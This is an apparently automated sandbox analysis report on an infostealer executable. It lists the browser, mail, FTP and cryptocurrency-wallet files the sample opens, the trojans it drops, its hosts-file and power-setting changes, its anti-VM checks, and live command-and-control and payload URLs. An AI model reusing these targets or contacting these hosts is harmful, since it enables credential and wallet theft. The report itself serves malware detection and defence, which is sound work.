                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00418CF0 GetSystemTime,0_2_00418CF0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_004179E0 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_004179E0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_00417BC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417BC0

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                    Source: C:\ProgramData\HIIDGCGCBF.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                    Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.3.b4s45TboUL.exe.2570000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.b4s45TboUL.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.b4s45TboUL.exe.2490e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.b4s45TboUL.exe.2570000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.b4s45TboUL.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR
                    Source: b4s45TboUL.exeString found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
                    Source: b4s45TboUL.exeString found in binary or memory: xodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDog
                    Source: b4s45TboUL.exeString found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
                    Source: b4s45TboUL.exeString found in binary or memory: window-state.json
                    Source: b4s45TboUL.exeString found in binary or memory: \jaxx\Local Storage\
                    Source: b4s45TboUL.exeString found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
                    Source: b4s45TboUL.exeString found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
                    Source: b4s45TboUL.exeString found in binary or memory: xodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDog
                    Source: b4s45TboUL.exeString found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
                    Source: b4s45TboUL.exeString found in binary or memory: passphrase.json
                    Source: b4s45TboUL.exeString found in binary or memory: \jaxx\Local Storage\
                    Source: b4s45TboUL.exeString found in binary or memory: \Ethereum\
                    Source: b4s45TboUL.exeString found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
                    Source: b4s45TboUL.exeString found in binary or memory: \Ethereum\
                    Source: b4s45TboUL.exeString found in binary or memory: file__0.localstorage
                    Source: b4s45TboUL.exeString found in binary or memory: \Coinomi\Coinomi\wallets\
                    Source: b4s45TboUL.exeString found in binary or memory: \Exodus\exodus.wallet\
                    Source: b4s45TboUL.exeString found in binary or memory: \MultiDoge\
                    Source: b4s45TboUL.exeString found in binary or memory: xodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDog
                    Source: b4s45TboUL.exeString found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
                    Source: b4s45TboUL.exeString found in binary or memory: eam Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.3.b4s45TboUL.exe.2570000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.b4s45TboUL.exe.2490e67.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.b4s45TboUL.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.b4s45TboUL.exe.2490e67.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.b4s45TboUL.exe.2570000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.b4s45TboUL.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: Process Memory Space: b4s45TboUL.exe PID: 6556, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E1307A sqlite3_transfer_bindings,0_2_61E1307A
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E2D5E6 sqlite3_bind_int64,0_2_61E2D5E6
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E2D595 sqlite3_bind_double,0_2_61E2D595
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E0B431 sqlite3_clear_bindings,0_2_61E0B431
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E037F3 sqlite3_value_frombind,0_2_61E037F3
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E2D781 sqlite3_bind_zeroblob64,0_2_61E2D781
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E2D714 sqlite3_bind_zeroblob,0_2_61E2D714
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E2D68C sqlite3_bind_pointer,0_2_61E2D68C
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E2D65B sqlite3_bind_null,0_2_61E2D65B
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E2D635 sqlite3_bind_int,0_2_61E2D635
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E2D9B0 sqlite3_bind_value,0_2_61E2D9B0
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E2D981 sqlite3_bind_text16,0_2_61E2D981
                    Source: C:\Users\user\Desktop\b4s45TboUL.exeCode function: 0_2_61E2D945 sqlite3_bind_text64,0_2_61E2D945
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    Abuse Elevation Control Mechanism
                    1
                    File and Directory Permissions Modification
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts11
                    Native API
                    1
                    Create Account
                    1
                    DLL Side-Loading
                    111
                    Disable or Modify Tools
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol4
                    Data from Local System
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Service Execution
                    1
                    Windows Service
                    1
                    Windows Service
                    1
                    Deobfuscate/Decode Files or Information
                    Security Account Manager3
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook111
                    Process Injection
                    1
                    Abuse Elevation Control Mechanism
                    NTDS145
                    System Information Discovery
                    Distributed Component Object ModelInput Capture114
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information
                    LSA Secrets1
                    Query Registry
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts23
                    Software Packing
                    Cached Domain Credentials651
                    Security Software Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSync441
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Masquerading
                    Proc Filesystem12
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt441
                    Virtualization/Sandbox Evasion
                    /etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                    Process Injection
                    Network Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    Remote System Discovery
                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545664 Sample: b4s45TboUL.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 71 198.187.3.20.in-addr.arpa 2->71 73 gosp.clinicavertigen.com 2->73 81 Suricata IDS alerts for network traffic 2->81 83 Found malware configuration 2->83 85 Malicious sample detected (through community Yara rule) 2->85 87 15 other signatures 2->87 10 b4s45TboUL.exe 19 2->10         started        15 updater.exe 2->15         started        17 svchost.exe 3 8 2->17         started        signatures3 process4 dnsIp5 75 45.91.200.39, 49730, 49738, 80 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Netherlands 10->75 77 gosp.clinicavertigen.com 87.106.236.48, 443, 49731 ONEANDONE-ASBrauerstrasse48DE Germany 10->77 65 C:\Users\user\AppData\...\chrome_131[1].exe, PE32+ 10->65 dropped 67 C:\ProgramData\chrome.dll, PE32 10->67 dropped 69 C:\ProgramData\HIIDGCGCBF.exe, PE32+ 10->69 dropped 97 Detected unpacking (changes PE section rights) 10->97 99 Detected unpacking (overwrites its own PE header) 10->99 101 Tries to steal Mail credentials (via file / registry access) 10->101 109 6 other signatures 10->109 19 cmd.exe 1 10->19         started        21 WerFault.exe 21 16 10->21         started        103 Multi AV Scanner detection for dropped file 15->103 105 Query firmware table information (likely to detect VMs) 15->105 107 Tries to detect sandboxes and other dynamic analysis tools (window names) 15->107 111 4 other signatures 15->111 24 WerFault.exe 2 17->24         started        file6 signatures7 process8 file9 26 HIIDGCGCBF.exe 1 3 19->26         started        30 conhost.exe 19->30         started        59 C:\ProgramData\Microsoft\...\Report.wer, Unicode 21->59 dropped process10 file11 61 C:\ProgramDatabehaviorgraphoogle\Chrome\updater.exe, PE32+ 26->61 dropped 63 C:\Windows\System32\drivers\etc\hosts, ASCII 26->63 dropped 89 Multi AV Scanner detection for dropped file 26->89 91 Query firmware table information (likely to detect VMs) 26->91 93 Uses powercfg.exe to modify the power settings 26->93 95 7 other signatures 26->95 32 powershell.exe 23 26->32         started        35 cmd.exe 1 26->35         started        37 sc.exe 1 26->37         started        39 12 other processes 26->39 signatures12 process13 signatures14 79 Loading BitLocker PowerShell Module 32->79 41 WmiPrvSE.exe 32->41         started        43 conhost.exe 32->43         started        45 conhost.exe 35->45         started        47 wusa.exe 35->47         started        49 conhost.exe 37->49         started        51 conhost.exe 39->51         started        53 conhost.exe 39->53         started        55 conhost.exe 39->55         started        57 9 other processes 39->57 process15

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    b4s45TboUL.exe39%ReversingLabs
                    b4s45TboUL.exe100%AviraHEUR/AGEN.1306967
                    b4s45TboUL.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\ProgramData\Google\Chrome\updater.exe47%ReversingLabsWin64.Trojan.Cerbu
                    C:\ProgramData\HIIDGCGCBF.exe47%ReversingLabsWin64.Trojan.Cerbu
                    C:\ProgramData\chrome.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\chrome_131[1].exe47%ReversingLabsWin64.Trojan.Cerbu
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    gosp.clinicavertigen.com
                    87.106.236.48
                    truefalse
                      unknown
                      198.187.3.20.in-addr.arpa
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://gosp.clinicavertigen.com/tmpp/chrome_131.exefalse
                          unknown
                          http://45.91.200.39/cb9cc10e175e1537/sqlite3.dlltrue
                            unknown
                            http://45.91.200.39/eaa194fa594ff9c2.phptrue
                              unknown
                              http://45.91.200.39/true
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabb4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://45.91.200.39/eaa194fa594ff9c2.phppb4s45TboUL.exe, 00000000.00000002.2105869002.0000000021011000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://duckduckgo.com/ac/?q=b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://gosp.clinicavertigen.com/-b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icob4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://45.91.200.39/eaa194fa594ff9c2.php4b4s45TboUL.exe, 00000000.00000002.2105869002.0000000021011000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkVb4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpfalse
                                          unknown
                                          https://docs.rs/getrandom#nodejs-es-module-supportb4s45TboUL.exe, b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://45.91.200.39/eaa194fa594ff9c2.php1f9a9c4a2f8b514.cdf-msb4s45TboUL.exe, 00000000.00000002.2090541481.00000000009C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://45.91.200.396b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
